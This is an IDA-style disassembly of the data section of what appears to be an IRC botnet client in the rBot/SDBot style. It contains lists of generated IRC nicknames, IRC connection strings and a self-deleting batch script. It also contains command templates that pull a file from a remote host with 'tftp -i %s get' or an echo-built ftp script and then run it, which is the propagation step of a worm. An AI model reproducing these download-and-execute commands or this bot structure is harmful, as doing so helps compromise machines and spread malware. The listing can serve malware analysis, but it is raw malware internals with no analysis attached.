align 4
aHaticem db 'haticem',0 ; DATA XREF: _2:0044F5D0�o
aErnesto db 'ERNESTO',0 ; DATA XREF: _2:0044F5D4�o
aAslii db 'aslii',0 ; DATA XREF: _2:0044F5D8�o
align 4
aPiramit db 'PIRAMIT',0 ; DATA XREF: _2:0044F5DC�o
aSamyeli21 db 'samyeli21',0 ; DATA XREF: _2:0044F5E0�o
align 10h
aRetg db 'RETG',0 ; DATA XREF: _2:0044F5E4�o
align 4
aBlackpearl db 'blackpearl',0 ; DATA XREF: _2:0044F5E8�o
align 4
aPelincik db 'pelincik',0 ; DATA XREF: _2:0044F5EC�o
align 10h
aAhmet db 'ahmet',0 ; DATA XREF: _2:0044F5F0�o
align 4
aTurkyy db 'turkyy',0 ; DATA XREF: _2:0044F5F4�o
align 10h
aAnk32m db 'ank32m',0 ; DATA XREF: _2:0044F5F8�o
align 4
aZack db 'ZACK',0 ; DATA XREF: _2:0044F5FC�o
align 10h
aIzmir39m db 'Izmir39m',0 ; DATA XREF: _2:0044F600�o
align 4
aAlbina db 'albina',0 ; DATA XREF: _2:0044F604�o
align 4
aAyla db 'AYLA-',0 ; DATA XREF: _2:0044F608�o
align 4
off_44F17C dd offset byte_457441 ; DATA XREF: _2:0044F60C�o
aAnkh db 'ankh',0 ; DATA XREF: _2:0044F610�o
align 4
aDonjuanm db 'Donjuanm',0 ; DATA XREF: _2:0044F614�o
align 4
aBogac db 'bogac',0 ; DATA XREF: _2:0044F618�o
align 4
aAlpay34m db 'alpay34m',0 ; DATA XREF: _2:0044F61C�o
align 4
aCongueror db 'CoNGuERoR',0 ; DATA XREF: _2:0044F620�o
align 4
aDenizlim db 'DenizliM',0 ; DATA XREF: _2:0044F624�o
align 10h
aBerk19m db 'Berk19m',0 ; DATA XREF: _2:0044F628�o
aDevran db 'devran',0 ; DATA XREF: _2:0044F62C�o
align 10h
aArda db 'arda',0 ; DATA XREF: _2:0044F630�o
align 4
aKeyiflisert db 'keyifliSERT',0 ; DATA XREF: _2:0044F634�o
aMurat34M db 'murat34-m',0 ; DATA XREF: _2:0044F638�o
align 10h
aHakan3 db 'hakan3',0 ; DATA XREF: _2:0044F63C�o
align 4
aImirzali db 'IMIRZALI--',0 ; DATA XREF: _2:0044F640�o
align 4
aRamtha db 'RAMTHA',0 ; DATA XREF: _2:0044F644�o
align 4
aEmre db 'Emre--',0 ; DATA XREF: _2:0044F648�o
align 4
aElmaazyok db 'elmaazyok',0 ; DATA XREF: _2:0044F64C�o
align 10h
aEsmerkiz db 'Esmerkiz',0 ; DATA XREF: _2:0044F650�o
align 4
aKebikec db 'kebikec',0 ; DATA XREF: _2:0044F654�o
aFlord db 'FLoRD',0 ; DATA XREF: _2:0044F658�o
align 4
aHoly db 'holy',0 ; DATA XREF: _2:0044F65C�o
align 4
aMahinur db 'MAHINUR',0 ; DATA XREF: _2:0044F660�o
aSadikaellesme db 'SaDIkaEllesme',0 ; DATA XREF: _2:0044F664�o
align 4
aAykut1 db 'aykut1',0 ; DATA XREF: _2:0044F668�o
align 4
aKashmira db 'Kashmira',0 ; DATA XREF: _2:0044F66C�o
align 10h
aSeviseli db 'SeViSeLi',0 ; DATA XREF: _2:0044F670�o
align 4
aSugarboy db 'SUGARBOY-',0 ; DATA XREF: _2:0044F674�o
align 4
aUzgun36 db 'uzgun36',0 ; DATA XREF: _2:0044F678�o
aKumul db 'kumul',0 ; DATA XREF: _2:0044F67C�o
align 4
aAdalim db 'ADALIM',0 ; DATA XREF: _2:0044F680�o
align 10h
aUmut db 'umut-',0 ; DATA XREF: _2:0044F684�o
align 4
aAnk32M db 'ANK-32-M',0 ; DATA XREF: _2:0044F688�o
align 4
aDjspace db 'DJSPACE',0 ; DATA XREF: _2:0044F68C�o
aAnkar db 'Ankar',0 ; DATA XREF: _2:0044F690�o
align 4
aFenerlee db 'FeNeRLee',0 ; DATA XREF: _2:0044F694�o
align 10h
aHayran db 'hayran',0 ; DATA XREF: _2:0044F698�o
align 4
aAngelgirl db 'angelgirl',0 ; DATA XREF: _2:0044F69C�o
align 4
aKapk db 'kapk',0 ; DATA XREF: _2:0044F6A0�o
align 4
aAchilles db 'Achilles',0 ; DATA XREF: _2:0044F6A4�o
align 4
aTegmen db 'TEGMEN',0 ; DATA XREF: _2:0044F6A8�o
align 10h
aKotan db 'kotan',0 ; DATA XREF: _2:0044F6AC�o
align 4
aSevda db 'sevda',0 ; DATA XREF: _2:0044F6B0�o
align 10h
off_44F310 dd offset byte_4B5245 ; DATA XREF: _2:0044F6B4�o
aAlcatras db 'alcatras',0 ; DATA XREF: _2:0044F6B8�o
align 10h
aA44m db 'a44m',0 ; DATA XREF: _2:0044F6BC�o
align 4
aBirsen db 'birsen',0 ; DATA XREF: _2:0044F6C0�o
align 10h
aYabanc db 'yabanc',0 ; DATA XREF: _2:0044F6C4�o
align 4
aDevre db 'devre',0 ; DATA XREF: _2:0044F6C8�o
align 10h
aErkan db 'erkan',0 ; DATA XREF: _2:0044F6CC�o
align 4
aAnkm db 'ankM',0 ; DATA XREF: _2:0044F6D0�o
align 10h
aAdem28 db 'Adem28',0 ; DATA XREF: _2:0044F6D4�o
align 4
aMaxsilla db 'maxsilla',0 ; DATA XREF: _2:0044F6D8�o
align 4
aM41ist db 'M41IST',0 ; DATA XREF: _2:0044F6DC�o
align 4
aAdamm33 db 'AdAMM33',0 ; DATA XREF: _2:0044F6E0�o
aFirtina db 'firtina',0 ; DATA XREF: _2:0044F6E4�o
aAta29 db 'Ata29',0 ; DATA XREF: _2:0044F6E8�o
align 4
aKoray db 'KORAY',0 ; DATA XREF: _2:0044F6EC�o
align 4
aAkden db 'akden',0 ; DATA XREF: _2:0044F6F0�o
align 4
aIzmirlm db 'izmirlm',0 ; DATA XREF: _2:0044F6F4�o
aUla db 'ula',0 ; DATA XREF: _2:0044F6F8�o
aNeHaber db 'NE-HABER',0 ; DATA XREF: _2:0044F6FC�o
align 4
aPassenger db 'passenger',0 ; DATA XREF: _2:0044F700�o
align 4
aTropikal db 'tropikal',0 ; DATA XREF: _2:0044F704�o
align 4
aCool30m db 'cool30m',0 ; DATA XREF: _2:0044F708�o
aCem39 db 'cem39',0 ; DATA XREF: _2:0044F70C�o
align 4
aRerpjj db 'RERPJJ',0 ; DATA XREF: _2:0044F710�o
align 4
aTeoman db 'TEOMAN```',0 ; DATA XREF: _2:0044F714�o
align 4
aDallas43m db 'DALLAS43M',0 ; DATA XREF: _2:0044F718�o
align 4
aPrometheus db 'prometheus',0 ; DATA XREF: _2:0044F71C�o
align 10h
aMaveRIck db 'MaVe{R}icK',0 ; DATA XREF: _2:0044F720�o
align 4
aAdamm db 'ADAMM',0 ; DATA XREF: _2:0044F724�o
align 4
aCumhur29 db 'cumhur29',0 ; DATA XREF: _2:0044F728�o
align 10h
aWantedlove db 'WANTEDLOVE',0 ; DATA XREF: _2:0044F72C�o
align 10h
off_44F430 dd offset aQwertyuipasdfg ; DATA XREF: sub_418428+5C�r
; "qwertyuipasdfghjklzxcvbnmQWERTYUIOPASDF"...
dd offset aQwertyuipasdfg+2
dd offset aQwertyuipasdfg+4
dd offset aQwertyuipasdfg+6
dd offset aQwertyuipasdfg+8
dd offset aQwertyuipasdfg+0Ah
dd offset aQwertyuipasdfg+0Ch
dd offset aQwertyuipasdfg+0Eh
dd offset aQwertyuipasdfg+10h
; ---------------------------------------------------------------------------
retn 44EEh
; ---------------------------------------------------------------------------
align 4
dd offset aQwertyuipasdfg+14h
dd offset aQwertyuipasdfg+16h
; ---------------------------------------------------------------------------
enter 44EEh, 0
retf 44EEh
; ---------------------------------------------------------------------------
align 4
dd offset aQwertyuipasdfg+1Ch
dd offset aQwertyuipasdfg+1Eh
dd offset aQwertyuipasdfg+20h
dd offset aQwertyuipasdfg+22h
dd offset aQwertyuipasdfg+24h
dd offset aQwertyuipasdfg+26h
dd offset aQwertyuipasdfg+28h
dd offset aQwertyuipasdfg+2Ah
dd offset aQwertyuipasdfg+2Ch
dd offset aQwertyuipasdfg+2Eh
dd offset aQwertyuipasdfg+30h
dd offset aQwertyuipasdfg+32h
dd offset aQwertyuipasdfg+34h
dd offset aQwertyuipasdfg+36h
dd offset aQwertyuipasdfg+38h
dd offset aQwertyuipasdfg+3Ah
dd offset aQwertyuipasdfg+3Ch
dd offset aQwertyuipasdfg+3Eh
dd offset aQwertyuipasdfg+40h
dd offset aQwertyuipasdfg+42h
dd offset aQwertyuipasdfg+44h
dd offset aQwertyuipasdfg+46h
dd offset aQwertyuipasdfg+48h
dd offset aQwertyuipasdfg+4Ah
dd offset aQwertyuipasdfg+4Ch
dd offset aQwertyuipasdfg+4Eh
dd offset aQwertyuipasdfg+50h
dd offset aQwertyuipasdfg+52h
dd offset aQwertyuipasdfg+54h
dd offset aQwertyuipasdfg+56h
dd offset aQwertyuipasdfg+58h
dd offset aQwertyuipasdfg+5Ah
dd offset aQwertyuipasdfg+5Ch
dd offset aQwertyuipasdfg+5Eh
dd offset aQwertyuipasdfg+60h
dd offset aQwertyuipasdfg+62h
dd offset aQwertyuipasdfg+64h
dd offset aSmartmir ; "SMARTMIR"
dd offset aFarooq ; "farooq"
dd offset aMaxxguy ; "maxxguy"
dd offset aBobmarley ; "BOBMARLEY"
dd offset aEmilya ; "emilya"
dd offset aKrizha ; "KRIZHA"
dd offset aCar1nna ; "Car1nna"
dd offset aSwin ; "swin"
dd offset aMale ; "male"
dd offset aKoko ; "koko"
dd offset aFlexster ; "flexster"
dd offset aKen ; "ken"
dd offset aShez ; "Shez"
dd offset aTalika ; "talika"
dd offset aMarcy ; "marcy"
dd offset aCme ; "cme"
dd offset aHeval ; "heval"
dd offset aBunty ; "bunty"
dd offset aJanno ; "janno"
dd offset aRimpy ; "rimpy"
dd offset aNastysha ; "nastysha"
dd offset aLuisa ; "Luisa"
dd offset aTroller ; "troller"
dd offset aManee ; "manee"
dd offset aKermit ; "kermit"
dd offset aPuregold ; "puregold"
dd offset aCoredump ; "CoreDump"
dd offset aImra ; "imra"
dd offset aGirl ; "GirL"
dd offset aCamel ; "CAMEL"
dd offset aReshma ; "reshma"
dd offset aKencing ; "Kencing"
dd offset aThr45h3r5 ; "THR45H3R5"
dd offset aCansuuuu ; "cansuuuu"
dd offset aKaan38dent ; "kaan38dent"
dd offset aErkan27 ; "erkan27"
dd offset aHexaaa ; "hexaaa"
dd offset aBerk19 ; "berk19"
dd offset aObenibisevse ; "OBeNiBiSeVSe"
dd offset aIrmal ; "irmal"
dd offset aMisssunday ; "misssunday"
dd offset aTolga34 ; "Tolga34"
dd offset aJericho ; "JERICHO"
dd offset aMary_0 ; "MARY"
dd offset aAkin ; "AKIN"
dd offset aMelekk ; "melekk"
dd offset aTrend3 ; "trend3"
dd offset aMERVE ; "M-E-R-V-E"
dd offset aTekir ; "tekir"
dd offset aVenedik34 ; "venedik34"
dd offset aSevmekmi ; "sevmekmi"
dd offset aSudenur ; "SUDENUR"
dd offset aArzu ; "ARZU"
dd offset aHaticem ; "haticem"
dd offset aErnesto ; "ERNESTO"
dd offset aAslii ; "aslii"
dd offset aPiramit ; "PIRAMIT"
dd offset aSamyeli21 ; "samyeli21"
dd offset aRetg ; "RETG"
dd offset aBlackpearl ; "blackpearl"
dd offset aPelincik ; "pelincik"
dd offset aAhmet ; "ahmet"
dd offset aTurkyy ; "turkyy"
dd offset aAnk32m ; "ank32m"
dd offset aZack ; "ZACK"
dd offset aIzmir39m ; "Izmir39m"
dd offset aAlbina ; "albina"
dd offset aAyla ; "AYLA-"
dd offset off_44F17C
dd offset aAnkh ; "ankh"
dd offset aDonjuanm ; "Donjuanm"
dd offset aBogac ; "bogac"
dd offset aAlpay34m ; "alpay34m"
dd offset aCongueror ; "CoNGuERoR"
dd offset aDenizlim ; "DenizliM"
dd offset aBerk19m ; "Berk19m"
dd offset aDevran ; "devran"
dd offset aArda ; "arda"
dd offset aKeyiflisert ; "keyifliSERT"
dd offset aMurat34M ; "murat34-m"
dd offset aHakan3 ; "hakan3"
dd offset aImirzali ; "IMIRZALI--"
dd offset aRamtha ; "RAMTHA"
dd offset aEmre ; "Emre--"
dd offset aElmaazyok ; "elmaazyok"
dd offset aEsmerkiz ; "Esmerkiz"
dd offset aKebikec ; "kebikec"
dd offset aFlord ; "FLoRD"
dd offset aHoly ; "holy"
dd offset aMahinur ; "MAHINUR"
dd offset aSadikaellesme ; "SaDIkaEllesme"
dd offset aAykut1 ; "aykut1"
dd offset aKashmira ; "Kashmira"
dd offset aSeviseli ; "SeViSeLi"
dd offset aSugarboy ; "SUGARBOY-"
dd offset aUzgun36 ; "uzgun36"
dd offset aKumul ; "kumul"
dd offset aAdalim ; "ADALIM"
dd offset aUmut ; "umut-"
dd offset aAnk32M ; "ANK-32-M"
dd offset aDjspace ; "DJSPACE"
dd offset aAnkar ; "Ankar"
dd offset aFenerlee ; "FeNeRLee"
dd offset aHayran ; "hayran"
dd offset aAngelgirl ; "angelgirl"
dd offset aKapk ; "kapk"
dd offset aAchilles ; "Achilles"
dd offset aTegmen ; "TEGMEN"
dd offset aKotan ; "kotan"
dd offset aSevda ; "sevda"
dd offset off_44F310
dd offset aAlcatras ; "alcatras"
dd offset aA44m ; "a44m"
dd offset aBirsen ; "birsen"
dd offset aYabanc ; "yabanc"
dd offset aDevre ; "devre"
dd offset aErkan ; "erkan"
dd offset aAnkm ; "ankM"
dd offset aAdem28 ; "Adem28"
dd offset aMaxsilla ; "maxsilla"
dd offset aM41ist ; "M41IST"
dd offset aAdamm33 ; "AdAMM33"
dd offset aFirtina ; "firtina"
dd offset aAta29 ; "Ata29"
dd offset aKoray ; "KORAY"
dd offset aAkden ; "akden"
dd offset aIzmirlm ; "izmirlm"
dd offset aUla ; "ula"
dd offset aNeHaber ; "NE-HABER"
dd offset aPassenger ; "passenger"
dd offset aTropikal ; "tropikal"
dd offset aCool30m ; "cool30m"
dd offset aCem39 ; "cem39"
dd offset aRerpjj ; "RERPJJ"
dd offset aTeoman ; "TEOMAN```"
dd offset aDallas43m ; "DALLAS43M"
dd offset aPrometheus ; "prometheus"
dd offset aMaveRIck ; "MaVe{R}icK"
dd offset aAdamm ; "ADAMM"
dd offset aCumhur29 ; "cumhur29"
dd offset aWantedlove ; "WANTEDLOVE"
dword_44F730 dd 786573h, 7A656Ch, 78657Ah, 65657274h, 0 ; DATA XREF: _2:off_44F8F0�o
; _2:0044F8F4�o ...
dword_44F744 dd 646162h, 67616Ch, 6D61747Ch, 7C6562h, 686F777Ch, 7Ch
; DATA XREF: _2:0044F900�o _2:0044F904�o ...
dd 6F747C2Dh, 7C74h, 6375737Ch, 7C6Bh, 63756C7Ch, 7C6Bh
dd 6275687Bh, 7Dh, 7865737Bh, 7Dh, 6E65677Bh, 7C73h, 756C7C7Ch
dd 662D7576h, 7Ch, 6B69777Ch, 7C6465h, 6B636973h, 7D7Dh
dd 3851h, 7C38717Ch, 620061h, 640063h, 660065h, 680067h
dd 5F0069h, 6B006Ah, 6D006Ch, 6F006Eh, 710070h, 7372h
dd 750074h, 770076h, 790078h, 7Ah, 70706168h, 79h, 6772h
dd 7974h, 6667h, 7472h, 666473h, 6975h, 7976756Ch, 0
aTrimy db 'trimy',0 ; DATA XREF: _2:0044F9C0�o
align 4
aTruck db 'truck',0 ; DATA XREF: _2:0044F9C4�o
align 10h
aMuckc db 'muckc',0 ; DATA XREF: _2:0044F9C8�o
aZ db 'z',0 ; DATA XREF: _2:0044F9CC�o
aGsq: ; DATA XREF: _2:0044F9D0�o _2:0044F9D4�o ...
unicode 0, <gsq>,0
off_44F830 dd offset loc_425242 ; DATA XREF: _2:0044F9DC�o
dword_44F834 dd 6C62627Ch, 0 ; DATA XREF: _2:0044F9E0�o
dword_44F83C dd 5F7C5Fh, 4D0046h, 5556554Ch, 0 ; DATA XREF: _2:0044F9EC�o
; _2:0044FA00�o ...
dword_44F84C dd 646153h, 665E5E5Eh, 62005Eh, 65656C53h, 676E6970h, 0
; DATA XREF: _2:0044FA0C�o _2:0044FA10�o ...
aFuck_0 db 'Fuck',0 ; DATA XREF: _2:0044FA28�o
align 4
aFree_0 db 'Free',0 ; DATA XREF: _2:0044FA2C�o
align 2
asc_44F872 db 'X',0 ; DATA XREF: _2:0044FA38�o
aBoy db 'BOY',0 ; DATA XREF: _2:0044FA40�o
aGirl_0 db 'GIRL',0 ; DATA XREF: _2:0044FA44�o
align 10h
aGurl db 'gurl',0 ; DATA XREF: _2:0044FA48�o
align 4
aShit db 'shit',0 ; DATA XREF: _2:0044FA4C�o
align 10h
aAha db 'aha',0 ; DATA XREF: _2:0044FA50�o
aYeah db 'yeah',0 ; DATA XREF: _2:0044FA54�o
align 4
aMuha db 'muha',0 ; DATA XREF: _2:0044FA58�o
align 4
aMof0 db 'mof0',0 ; DATA XREF: _2:0044FA5C�o
align 4
aMofo db 'mofo',0 ; DATA XREF: _2:0044FA60�o
align 4
aTot db 'tot',0 ; DATA XREF: _2:0044FA64�o
aLol db 'lol',0 ; DATA XREF: _2:0044FA68�o
aLoloA db 'lolo|a|',0 ; DATA XREF: _2:0044FA6C�o
aSex4free db '|sex4free|',0 ; DATA XREF: _2:0044FA70�o
align 10h
a4us db '|4us|',0 ; DATA XREF: _2:0044FA74�o
align 4
a4you db '{4you}',0 ; DATA XREF: _2:0044FA78�o
align 10h
a4u db '|4u|',0 ; DATA XREF: _2:0044FA7C�o
align 4
a5u db '5u',0 ; DATA XREF: _2:0044FA80�o
align 4
a6u db '6u',0 ; DATA XREF: _2:0044FA84�o
align 10h
off_44F8F0 dd offset dword_44F730 ; DATA XREF: sub_418428+41�r
; sub_418428+EC�r
dd offset dword_44F730+4
dd offset dword_44F730+8
dd offset dword_44F730+0Ch
dd offset dword_44F744
dd offset dword_44F744+4
dd offset dword_44F744+8
dd offset dword_44F744+10h
dd offset dword_44F744+18h
dd offset dword_44F744+20h
dd offset dword_44F744+28h
dd offset dword_44F744+30h
dd offset dword_44F744+38h
dd offset dword_44F744+40h
dd offset dword_44F744+48h
dd offset dword_44F744+54h
dd offset dword_44F744+5Ch
dd offset dword_44F744+64h
dd offset dword_44F744+68h
dd offset dword_44F744+6Eh
dd offset dword_44F744+70h
dd offset dword_44F744+72h
dd offset dword_44F744+74h
dd offset dword_44F744+76h
dd offset dword_44F744+78h
dd offset dword_44F744+7Ah
dd offset dword_44F744+7Ch
; ---------------------------------------------------------------------------
retn 44F7h
; ---------------------------------------------------------------------------
align 10h
dd offset dword_44F744+80h
dd offset dword_44F744+82h
; ---------------------------------------------------------------------------
enter 44F7h, 0
retf 44F7h
; ---------------------------------------------------------------------------
align 10h
dd offset dword_44F744+88h
dd offset dword_44F744+8Ah
dd offset dword_44F744+8Ch
dd offset dword_44F744+8Eh
dd offset dword_44F744+90h
dd offset dword_44F744+94h
dd offset dword_44F744+96h
dd offset dword_44F744+98h
dd offset dword_44F744+9Ah
dd offset dword_44F744+9Ch
dd offset dword_44F744+9Eh
dd offset dword_44F744+0A0h
dd offset dword_44F744+0A4h
dd offset dword_44F744+0ACh
dd offset dword_44F744+0B0h
dd offset dword_44F744+0B4h
dd offset dword_44F744+0B8h
dd offset dword_44F744+0BCh
dd offset dword_44F744+0C0h
dd offset dword_44F744+0C4h
dd offset aTrimy ; "trimy"
dd offset aTruck ; "truck"
dd offset aMuckc ; "muckc"
dd offset aZ ; "z"
dd offset aGsq ; "gsq"
dd offset aGsq+2
dd offset aGsq+4
dd offset off_44F830
dd offset dword_44F834
dd offset byte_4F2778
dd offset byte_4F2779
dd offset dword_44F83C
dd offset byte_4F277A
dd offset byte_4F277B
dd offset byte_4F277C
dd offset byte_4F277D
dd offset dword_44F83C+4
dd offset dword_44F83C+6
dd offset dword_44F83C+8
dd offset dword_44F84C
dd offset dword_44F84C+4
dd offset dword_44F84C+0Ah
dd offset byte_4F277E
dd offset dword_44F84C+0Ch
dd offset byte_4F277F
dd offset byte_4F2780
dd offset aFuck_0 ; "Fuck"
dd offset aFree_0 ; "Free"
dd offset byte_4F2781
dd offset byte_4F2782
dd offset asc_44F872 ; "X"
dd offset byte_4F2783
dd offset aBoy ; "BOY"
dd offset aGirl_0 ; "GIRL"
dd offset aGurl ; "gurl"
dd offset aShit ; "shit"
dd offset aAha ; "aha"
dd offset aYeah ; "yeah"
dd offset aMuha ; "muha"
dd offset aMof0 ; "mof0"
dd offset aMofo ; "mofo"
dd offset aTot ; "tot"
dd offset aLol ; "lol"
dd offset aLoloA ; "lolo|a|"
dd offset aSex4free ; "|sex4free|"
dd offset a4us ; "|4us|"
dd offset a4you ; "{4you}"
dd offset a4u ; "|4u|"
dd offset a5u ; "5u"
dd offset a6u ; "6u"
asc_44FA88: ; DATA XREF: sub_4180CE+6�o
dw 0Ah
unicode 0, < >,0
aPing_1 db 'PING',0 ; DATA XREF: sub_418115+50�o
align 4
aPongS_0 db 'PONG %s',0Ah,0 ; DATA XREF: sub_418115+67�o
align 4
a433_0 db '433',0 ; DATA XREF: sub_418115:loc_41818C�o
a432 db '432',0 ; DATA XREF: sub_418115+88�o
aNickS_5 db 'NICK %s',0Ah,0 ; DATA XREF: sub_418115+C3�o
align 4
aNickSUserSHotm db 'NICK %s',0Ah ; DATA XREF: sub_41820B+98�o
db 'USER %s "hotmail.com" "127.0.0.1" :%s',0Ah,0
align 4
a__2 db '-|`_\{[]}',0 ; DATA XREF: sub_418428+BC�o
; sub_418428+174�r ...
align 8
dword_44FAF8 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 ; DATA XREF: _0:00418903�o
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_44FB44 dd 3000005h, 10h, 18h, 1, 3 dup(0) ; DATA XREF: _0:00418942�o
; ---------------------------------------------------------------------------
loc_44FB60: ; DATA XREF: _0:00418977�o
mov al, 1
push edx
xchg eax, edi
retf 0D059h
; ---------------------------------------------------------------------------
db 11h
dd 0A000D5A8h, 51800DC9h, 0
dword_44FB74 dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0 ; DATA XREF: _0:0041899E�o
aSErrorSD_ db '%s Error: %s <%d>.',0 ; DATA XREF: sub_418C20+72�o
align 4
aMirc_2 db 'mIRC',0 ; DATA XREF: sub_418CE5+5�o
align 4
aMirc_3 db 'mIRC',0 ; DATA XREF: sub_418CE5+18�o
align 4
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_418D6A+1C�o
align 4
aSS_5 db '%s %s',0 ; DATA XREF: _0:00418E50�o
align 4
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_418E8C+2�o
aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_418EAE+48�o
align 8
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_418EAE+85�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db 'del "%s"',0
aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_418EAE+140�o
align 4
dword_44FC44 dd 234032Dh, 2676F6Ch, 25202D03h, 6F6C2073h, 6C632067h
; DATA XREF: sub_419036+5C�o
dd 65726165h, 64h
unk_44FC60 db 2Dh ; - ; DATA XREF: sub_419036+8F�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aFailedWithErro db '- failed with error code %d',0
align 4
unk_44FC88 db 2Dh ; - ; DATA XREF: sub_419036+9C�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aOperatingSyste db '- operating system is not supported',0
align 4
aTftpISGetSS db 'tftp -i %s get %s &%s',0Dh,0Ah,0 ; DATA XREF: _0:00419196�o
aEchoOpenSDOE_0 db 'echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo qu'
; DATA XREF: _0:004191BF�o
db 'it >> o &ftp -n -s:o &%s',0Dh,0Ah,0
aNetapi32_dll_0 db 'netapi32.dll',0 ; DATA XREF: sub_419229+47�o
align 4
aNetmessagebu_0 db 'NetMessageBufferSend',0 ; DATA XREF: sub_419229+54�o
align 8
aAdd db 'Add',0 ; DATA XREF: _2:off_44FDD0�o
aAdded db 'Added',0 ; DATA XREF: _2:off_44FDD4�o
align 4
aDelete_1 db 'Delete',0 ; DATA XREF: _2:0044FDDC�o
align 4
aDeleted db 'Deleted',0 ; DATA XREF: _2:0044FDE0�o
aList_1 db 'List',0 ; DATA XREF: _2:0044FDE8�o
align 4
aListed db 'Listed',0 ; DATA XREF: _2:0044FDEC�o
align 4
aStart_0 db 'Start',0 ; DATA XREF: _2:0044FDF4�o
align 4
aStarted db 'Started',0 ; DATA XREF: _2:0044FDF8�o
aStop_0 db 'Stop',0 ; DATA XREF: _2:0044FE00�o
align 4
aStopped_0 db 'Stopped',0 ; DATA XREF: _2:0044FE04�o
aPause_0 db 'Pause',0
align 4
aPaused_0 db 'Paused',0
align 4
aContinue_0 db 'Continue',0
align 10h
aContinued db 'Continued',0
align 10h
off_44FDD0 dd offset aAdd ; DATA XREF: sub_419350+6D�r
; sub_419737+50�r ...
; "Add"
off_44FDD4 dd offset aAdded ; DATA XREF: sub_419350+2D�r
; sub_419737+82�r ...
; "Added"
dword_44FDD8 dd 0 ; DATA XREF: sub_419350+18�r
dd offset aDelete_1 ; "Delete"
dd offset aDeleted ; "Deleted"
align 8
dd offset aList_1 ; "List"
dd offset aListed ; "Listed"
dd 0
dd offset aStart_0 ; "Start"
dd offset aStarted ; "Started"
align 10h
dd offset aStop_0 ; "Stop"
dd offset aStopped_0 ; "Stopped"
dd 1, 44FDA4h, 44FDACh, 2, 44FDB4h, 44FDC0h, 3
unk_44FE24 db 2Dh ; - ; DATA XREF: sub_419350+38�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSServiceS db '- %s service: ',27h,'%s',27h,0
unk_44FE40 db 2Dh ; - ; DATA XREF: sub_419350+55�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aErrorWithServi db '- error with service: ',27h,'%s',27h,' - %s',0
align 4
unk_44FE6C db 2Dh ; - ; DATA XREF: sub_419350+74�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoServiceSpec db '- %s: no service specified',0
aTheSpecifiedSe db 'The specified service name is invalid.',0 ; DATA XREF: sub_419479+3C�o
align 4
aTheRequestedCo db 'The requested control code is undefined.',0
; DATA XREF: sub_419479:loc_4194BF�o
align 4
aTheHandleIsInv db 'The handle is invalid.',0 ; DATA XREF: sub_419479:loc_4194C9�o
align 4
aTheHandleDoesN db 'The handle does not have the required access right.',0
; DATA XREF: sub_419479:loc_4194D3�o
aTheServiceBina db 'The service binary file could not be found.',0
; DATA XREF: sub_419479:loc_4194DD�o
align 10h
aTheServiceCann db 'The service cannot be stopped because other running services are '
; DATA XREF: sub_419479:loc_4194E7�o
db 'dependent on it.',0
align 4
aTheDatabaseIsL db 'The database is locked.',0 ; DATA XREF: sub_419479+8F�o
aAThreadCouldNo db 'A thread could not be created for the service.',0
; DATA XREF: sub_419479:loc_419512�o
align 10h
aTheProcessForT db 'The process for the service was started, but it did not call Star'
; DATA XREF: sub_419479:loc_419519�o
db 'tServiceCtrlDispatcher.',0
align 10h
aTheRequested_0 db 'The requested control code is not valid, or it is unacceptable to'
; DATA XREF: sub_419479:loc_419520�o
db ' the service.',0
align 10h
aAnInstanceOfTh db 'An instance of the service is already running.',0
; DATA XREF: sub_419479:loc_419527�o
align 10h
aTheSpecifiedDa db 'The specified database does not exist.',0
; DATA XREF: sub_419479:loc_419552�o
align 4
aTheServiceDepe db 'The service depends on a service that does not exist or has been '
; DATA XREF: sub_419479:loc_419559�o
db 'marked for deletion.',0
align 10h
aTheServiceDe_0 db 'The service depends on another service that has failed to start.',0
; DATA XREF: sub_419479:loc_419560�o
align 4
aTheServiceHasB db 'The service has been disabled.',0 ; DATA XREF: sub_419479:loc_419567�o
align 4
aTheSpecified_0 db 'The specified service does not exist.',0
; DATA XREF: sub_419479:loc_41956E�o
align 10h
aTheServiceCoul db 'The service could not be logged on. The account does not have the'
; DATA XREF: sub_419479:loc_419575�o
db ' correct access rights.',0
align 4
aTheServiceHa_0 db 'The service has been marked for deletion.',0
; DATA XREF: sub_419479:loc_41957C�o
align 4
aTheRequested_1 db 'The requested control code cannot be sent to the service because '
; DATA XREF: sub_419479:loc_419583�o
db 'the state of the service.',0
align 4
aTheServiceHasN db 'The service has not been started.',0 ; DATA XREF: sub_419479:loc_41958A�o
align 4
aTheSystemIsShu db 'The system is shutting down.',0 ; DATA XREF: sub_419479:loc_419591�o
align 4
aAnUnknownError db 'An unknown error occurred: <%ld>',0 ; DATA XREF: sub_419479+12C�o
align 4
aTheFollowingWi db 'The following Windows services are registered:',0
; DATA XREF: sub_4195F7+25�o
align 4
aUnknown db ' Unknown',0 ; DATA XREF: sub_4195F7+9E�o
aPaused db ' Paused',0 ; DATA XREF: sub_4195F7:loc_41969C�o
aPausing db ' Pausing',0 ; DATA XREF: sub_4195F7:loc_4196A3�o
aContinuing db ' Continuing',0 ; DATA XREF: sub_4195F7:loc_4196AA�o
aRunning db ' Running',0 ; DATA XREF: sub_4195F7:loc_4196B1�o
aStoping db ' Stoping',0 ; DATA XREF: sub_4195F7:loc_4196B8�o
aStarting db ' Starting',0 ; DATA XREF: sub_4195F7:loc_4196BF�o
aStopped db ' Stopped',0 ; DATA XREF: sub_4195F7:loc_4196C6�o
aSSS_0 db '%s: %s (%s)',0 ; DATA XREF: sub_4195F7+EE�o
unk_4503D8 db 2Dh ; - ; DATA XREF: sub_419737+57�o
db 3, 34h, 2
